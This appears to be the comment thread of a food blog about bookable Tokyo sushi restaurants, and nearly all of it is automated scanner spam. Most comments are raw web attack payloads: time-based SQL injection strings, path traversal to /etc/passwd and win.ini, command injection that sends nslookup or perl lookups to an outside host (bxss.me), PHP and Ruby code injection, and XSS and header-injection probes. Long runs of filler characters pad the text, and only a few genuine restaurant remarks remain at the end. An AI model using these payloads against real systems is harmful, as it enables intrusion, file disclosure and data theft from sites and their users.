.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Wanderlusting
WEB-INF/web.xml
re: Wanderlusting
WEB-INF\web.xml
re: Wanderlusting
1
re: Wanderlusting
1
re: Wanderlusting
-1 OR 2+81-81-1=0+0+0+1 --
re: Wanderlusting
-1 OR 3+81-81-1=0+0+0+1 --
re: Wanderlusting
-1 OR 2+46-46-1=0+0+0+1
re: Wanderlusting
-1 OR 3+46-46-1=0+0+0+1
re: Wanderlusting
-1' OR 2+255-255-1=0+0+0+1 --
re: Wanderlusting
-1' OR 3+255-255-1=0+0+0+1 --
re: Wanderlusting
-1' OR 2+639-639-1=0+0+0+1 or 'dHMWl2PI'='
re: Wanderlusting
-1' OR 3+639-639-1=0+0+0+1 or 'dHMWl2PI'='
re: Wanderlusting
-1" OR 2+77-77-1=0+0+0+1 --
re: Wanderlusting
-1" OR 3+77-77-1=0+0+0+1 --
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
Xsr718Ds'; waitfor delay '0:0:15' --
re: Wanderlusting
-5 OR 614=(SELECT 614 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 355=(SELECT 355 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 150=(SELECT 150 FROM PG_SLEEP(15))--
re: Wanderlusting
JpSvb0tR' OR 257=(SELECT 257 FROM PG_SLEEP(15))--
re: Wanderlusting
Ue7LeNPn') OR 687=(SELECT 687 FROM PG_SLEEP(15))--
re: Wanderlusting
F6VAJkSh')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--
re: Wanderlusting
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@AuEd7
A new list (not by the same author) was posted recently https://www.luxeat.com/blog/9-easy-to-book-sushi-yas-in-tokyo-by-nigiri-paris/
re: magiquonnu
1BhveAPE6zO
re: magiquonnu
<esi:include src="http://bxss.me/rpb.png"/>
re: magiquonnu
%0abcc:074625.67-22079.67.8182b.19990.2@bxss.me
re: magiquonnu
${9999373+9999089}
re: magiquonnu
response.write(9885492*9627640)
re: magiquonnu
to@example.com>%0d%0abcc:074625.67-22080.67.8182b.19990.2@bxss.me
re: magiquonnu
'+response.write(9885492*9627640)+'
re: magiquonnu
"+response.write(9885492*9627640)+"
re: magiquonnu
../../../../../../../../../../../../../../etc/passwd
re: magiquonnu
../../../../../../../../../../../../../../windows/win.ini
re: magiquonnu
file:///etc/passwd
re: magiquonnu
)
re: magiquonnu
'.gethostbyname(lc('hitcf'.'tcjqwvace654c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(73).chr(102).chr(65).'
re: magiquonnu
../../../../../../../../../../../../../../../proc/version
re: magiquonnu
!(()&&!|*|*|
re: magiquonnu
".gethostbyname(lc("hittz"."pmhvshih2f11b.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(89).chr(108).chr(70)."
re: magiquonnu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: magiquonnu
^(#$!@#$)(()))******
re: magiquonnu
../../../../../../../../../../etc/passwd%00.jpg
re: magiquonnu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: magiquonnu
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: magiquonnu
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: magiquonnu
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: magiquonnu
HttP://bxss.me/t/xss.html?%00
re: magiquonnu
"+"A".concat(70-3).concat(22*4).concat(111).concat(66).concat(108).concat(79)+(require"socket"
Socket.gethostbyname("hitpg"+"ttzgxpqb34d16.bxss.me.")[3].to_s)+"
re: magiquonnu
/etc/passwd
re: magiquonnu
bxss.me/t/xss.html?%00
re: magiquonnu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: magiquonnu
'+'A'.concat(70-3).concat(22*4).concat(103).concat(72).concat(119).concat(73)+(require'socket'
Socket.gethostbyname('hitij'+'ksxfyxaw5f68d.bxss.me.')[3].to_s)+'
re: magiquonnu
echo wyisnq$()\ fbnxmp\nz^xyu||a #' &echo wyisnq$()\ fbnxmp\nz^xyu||a #|" &echo wyisnq$()\ fbnxmp\nz^xyu||a #
re: magiquonnu
%2fetc%2fpasswd
re: magiquonnu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: magiquonnu
&echo sasbww$()\ efaclr\nz^xyu||a #' &echo sasbww$()\ efaclr\nz^xyu||a #|" &echo sasbww$()\ efaclr\nz^xyu||a #
re: magiquonnu
/.././.././.././.././.././.././.././../etc/./passwd%00
re: magiquonnu
Http://bxss.me/t/fit.txt
re: magiquonnu
|echo qjjfoc$()\ izhxet\nz^xyu||a #' |echo qjjfoc$()\ izhxet\nz^xyu||a #|" |echo qjjfoc$()\ izhxet\nz^xyu||a #
re: magiquonnu
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: magiquonnu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: magiquonnu
http://bxss.me/t/fit.txt%3F.jpg
re: magiquonnu
'"
re: magiquonnu
(nslookup hitwcwhwqqzzz4a6de.bxss.me||perl -e "gethostbyname('hitwcwhwqqzzz4a6de.bxss.me')")
re: magiquonnu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: magiquonnu
';print(md5(31337));$a='
re: magiquonnu
/etc/shells
re: magiquonnu
<!--
re: magiquonnu
$(nslookup hitagpuqpxbkl625da.bxss.me||perl -e "gethostbyname('hitagpuqpxbkl625da.bxss.me')")
re: magiquonnu
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: magiquonnu
";print(md5(31337));$a="
re: magiquonnu
c:/windows/win.ini
re: magiquonnu
&nslookup hitmdickeqzsfd6e17.bxss.me&'\"`0&nslookup hitmdickeqzsfd6e17.bxss.me&`'
re: magiquonnu
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: magiquonnu
${@print(md5(31337))}
re: magiquonnu
bxss.me
re: magiquonnu
&(nslookup hitavbsvavksaaa024.bxss.me||perl -e "gethostbyname('hitavbsvavksaaa024.bxss.me')")&'\"`0&(nslookup hitavbsvavksaaa024.bxss.me||perl -e "gethostbyname('hitavbsvavksaaa024.bxss.me')")&`'
re: magiquonnu
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: magiquonnu
${@print(md5(31337))}\
re: magiquonnu
|(nslookup hithekzhzgkzm50ead.bxss.me||perl -e "gethostbyname('hithekzhzgkzm50ead.bxss.me')")
re: magiquonnu
file:///etc/passwd
re: magiquonnu
'.print(md5(31337)).'
re: magiquonnu
`(nslookup hitcptvrsdoulbbaff.bxss.me||perl -e "gethostbyname('hitcptvrsdoulbbaff.bxss.me')")`
re: magiquonnu
/\../\../\../\../\../\../\../etc/passwd
re: magiquonnu
;(nslookup hitoplruogtsgfc035.bxss.me||perl -e "gethostbyname('hitoplruogtsgfc035.bxss.me')")|(nslookup hitoplruogtsgfc035.bxss.me||perl -e "gethostbyname('hitoplruogtsgfc035.bxss.me')")&(nslookup hitoplruogtsgfc035.bxss.me||perl -e "gethostbyname('hitoplruogtsgfc035.bxss.me')")
re: magiquonnu
/WEB-INF/web.xml
re: magiquonnu
C:\WINDOWS\system32\drivers\etc\hosts
re: magiquonnu
../../../../../../../../../../windows/win.ini%00.jpg
re: magiquonnu
/../../../../../../../../../../boot.ini
re: magiquonnu
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: magiquonnu
..\..\..\..\..\..\..\..\windows\win.ini
re: magiquonnu
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: magiquonnu
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: magiquonnu
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: magiquonnu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: magiquonnu
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: magiquonnu
WEB-INF/web.xml
re: magiquonnu
WEB-INF\web.xml
re: magiquonnu
1
re: magiquonnu
1
re: magiquonnu
-1 OR 2+275-275-1=0+0+0+1 --
re: magiquonnu
-1 OR 3+275-275-1=0+0+0+1 --
re: magiquonnu
-1 OR 2+260-260-1=0+0+0+1
re: magiquonnu
-1 OR 3+260-260-1=0+0+0+1
re: magiquonnu
-1' OR 2+487-487-1=0+0+0+1 --
re: magiquonnu
-1' OR 3+487-487-1=0+0+0+1 --
re: magiquonnu
-1' OR 2+144-144-1=0+0+0+1 or 'JLlZdwPQ'='
re: magiquonnu
-1' OR 3+144-144-1=0+0+0+1 or 'JLlZdwPQ'='
re: magiquonnu
-1" OR 2+571-571-1=0+0+0+1 --
re: magiquonnu
-1" OR 3+571-571-1=0+0+0+1 --
re: magiquonnu
if(now()=sysdate(),sleep(15),0)
re: magiquonnu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: magiquonnu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: magiquonnu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: magiquonnu
-1; waitfor delay '0:0:15' --
re: magiquonnu
-1); waitfor delay '0:0:15' --
re: magiquonnu
1 waitfor delay '0:0:15' --
re: magiquonnu
Z6No7M6X'; waitfor delay '0:0:15' --
re: magiquonnu
-5 OR 185=(SELECT 185 FROM PG_SLEEP(15))--
re: magiquonnu
-5) OR 212=(SELECT 212 FROM PG_SLEEP(15))--
re: magiquonnu
-1)) OR 132=(SELECT 132 FROM PG_SLEEP(15))--
re: magiquonnu
OV1OeYCR' OR 68=(SELECT 68 FROM PG_SLEEP(15))--
re: magiquonnu
QtpfF6as') OR 327=(SELECT 327 FROM PG_SLEEP(15))--
re: magiquonnu
w6SHbpwo')) OR 404=(SELECT 404 FROM PG_SLEEP(15))--
re: magiquonnu
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: magiquonnu
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: magiquonnu
'||(select 1 from (select pg_sleep(15))x)||'
re: magiquonnu
''||(select 1 from (select pg_sleep(15))x)||''
re: magiquonnu
1'"
re: magiquonnu
@@wyywj
Thanks for sharing. Agree with Suzuki and Owana and Tsukiuda is good too but definitely do not recommend Udatsu and Kizaki. Don't think the others are notable.
https://www.luxeat.com/blog/20-possible-to-book-sushi-yas-in-tokyo/ dropped a couple of weeks ago. Not a lot of difference from the 2023 list.
Thanks guest. Sushi mitaka looks interesting.